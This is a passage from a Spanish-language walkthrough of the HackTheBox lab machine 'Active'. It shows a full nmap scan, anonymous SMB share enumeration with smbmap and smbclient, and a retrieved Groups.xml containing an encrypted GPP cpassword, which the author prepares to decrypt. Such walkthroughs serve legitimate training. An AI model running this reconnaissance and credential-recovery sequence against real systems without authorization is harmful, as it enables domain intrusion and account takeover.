comando:
nmap -Pn -n --disable-arp-ping --min-rate 4000 -sV -sC -p- --open 10.10.10.100 -oN escaneos
Dándonos:
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-04-05 15:54 -05
Nmap scan report for 10.10.10.100
Host is up (0.19s latency).
Not shown: 62691 closed tcp ports (conn-refused), 2821 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-05 20:55:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-05T20:56:29
|_ start_date: 2025-04-05T20:49:51
|_clock-skew: 1s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 106.53 seconds
Los servicios que nos da son los clásicos entre ellos destaquemos:
| Servicio | Puerto |
|---|---|
| Kerberos | 88 |
| SMB | 139,445 |
| LDAP | 389 |
Como sabemos la existencia de Samba dentro de la maquina victima usaremos la herramienta smbmap para enumerarla
smbmap -H 10.10.10.100
smbmap -H 10.10.10.100 -r Replication
smbmap -H 10.10.10.100 -r Replication/active.htb
smbclient -N //10.10.10.100/Replication
Una vez nos encontremos el archivo Groups.xml dentro de algun directorio de GUID nos los descargaremos
│ File: Groups.xml
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ <?xml version="1.0" encoding="utf-8"?>
2 │ <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties acti
│ on="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS
│ "/></User>
3 │ </Groups>
Usaremos la herramienta gpp-decryp como ya mencionamos este tipo de encriptamiento es debil asi que sin problema debe salir: